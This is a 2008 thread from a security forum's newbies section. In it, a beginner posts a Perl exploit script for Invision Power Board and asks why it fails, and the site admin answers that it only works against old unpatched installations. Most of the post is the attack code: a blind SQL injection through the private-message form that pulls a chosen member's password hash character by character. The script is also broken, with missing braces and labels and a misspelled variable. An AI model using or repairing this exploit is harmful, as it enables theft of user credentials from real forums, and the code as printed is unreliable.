IT Security and Insecurity Portal |
i need some help guys. |
Posted: Wed Dec 03, 2008 7:21 pm |
silverninja |
Beginner |

Joined: Dec 03, 2008 |
Posts: 3 |
sup guys, i have been looking throw alot of tutorials throw the internet for the past few weeks, and im really getting stuck here, i don't wanna hack no one, but i just wanna learn how to do these stuff.
i created a new ipbfree forum, and im trying to hack it (trying to find the admin password that i have created) i just wanna know the way to do it, here is what i did so far and the stuff that i got.
ok i got active perl 5
i got the ipb.ip expoilt
here is the code:
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;
# variables
my $login_page = '?act=Login&CODE=01';
my $pm_page = '?act=Msg&CODE=04';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $hash = '';
my $need_null = 0;
my $i;
my $j;
my @charset = ('0' .. '9', 'a' .. 'f');
my %form = (act => 'Msg',
CODE => '04',
MODE => '01',
OID => '',
removeattachid => '',
msg_title => 'asdf',
bbmode => 'normal',
ffont => 0,
fsize => 0,
fcolor => 0,
LIST => ' LIST ',
helpbox => 'Insert Monotype Text (alt + p)',
tagcount => 0,
Post => 'jkl');
# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
# init the cookie jar
$ua->cookie_jar ($cj);
# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";
# get user input
print 'IPB Forum URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty; # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty; # to turn it back on
print "\n" if $stty;
print 'Target userid ? '; # it'll say next to one of their posts
chomp (my $tid = <STDIN>);
# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }
do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
} while ($tries-- && !$resp->is_success());
# reset tries
$tries = 5;
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
# get ourselves a post_key (and an auth_key too with newer versions)
do {
$resp = $ua->get ($base_url . $pm_page);
} while ($tries-- && !$resp->is_success());
# reset tries
$tries = 5;
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#)
$form{post_key} = $1;
} else {
die "Error: couldn't get a post key.\n";
if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#)
$form{auth_key} = $1;
# turn off buffering so chars in the hash show up straight away
$| = 1;
print "\nAttempting to extract password hash from database...\n ";
for ($i = 0; $i < 32; ++$i) {
for ($j = 0; $j < @charset; ++$j) {
# reset tries
$tries = 5;
print "\x08", $charset[$j];
# build sql injection
$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
. (join (',', map {ord} split ('', $user))) . ') FROM '
. 'ibf_members WHERE id = ' . $tid . ' AND MID('
. 'member_login_key, ' . ($i + 1) . ', 1) = CHAR('
. ord ($charset[$j]) . ')';
$form{from_contact} = $sql;
$resp = $ua->post ($base_url . $post_pm_page, \%form,
referer => $base_url . $pm_page);
if (!$resp->is_success()) {
die "\nError: " . $resp->status_line
. "\n" if (!$tries);
if ($resp->content =~ /sql error/i) {
if ($need_null) {
die "Error: SQL error.\n";
} else {
$need_null = 1;
redo OFFSET;
} elsif ($resp->content !~ /there is no such member/i) {
# we have a winner !
print ' ';
next OFFSET;
# uh oh, something went wrong
die "\nError: couldn't get a char for offset $i\n";
print "\x08 \x08\nHit enter to quit.\n";
ok here is what i do,
in this screen shot is everything i do, i end up with this error "couldn't get a post key"
why is that? i need your help guys, so can someone help me and show me how to fix this please.
my forum url is da2.ipbfree.net u can log or register if u want, as i don't use this board no more.
i just want to learn these stuff, so can someone lead me to the right direction plz.
thanks. |
Posted: Fri Dec 05, 2008 1:22 pm |
silverninja |
Beginner |

Joined: Dec 03, 2008 |
Posts: 3 |
bump... can someone give me answer please. |
Posted: Fri Dec 05, 2008 2:40 pm |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
You can't hack ipbfree forums with such exploit scripts. This will work only against old and unpatched installations. And ipbfree is well protected  |
www.waraxe.us Forum Index -> Newbies corner
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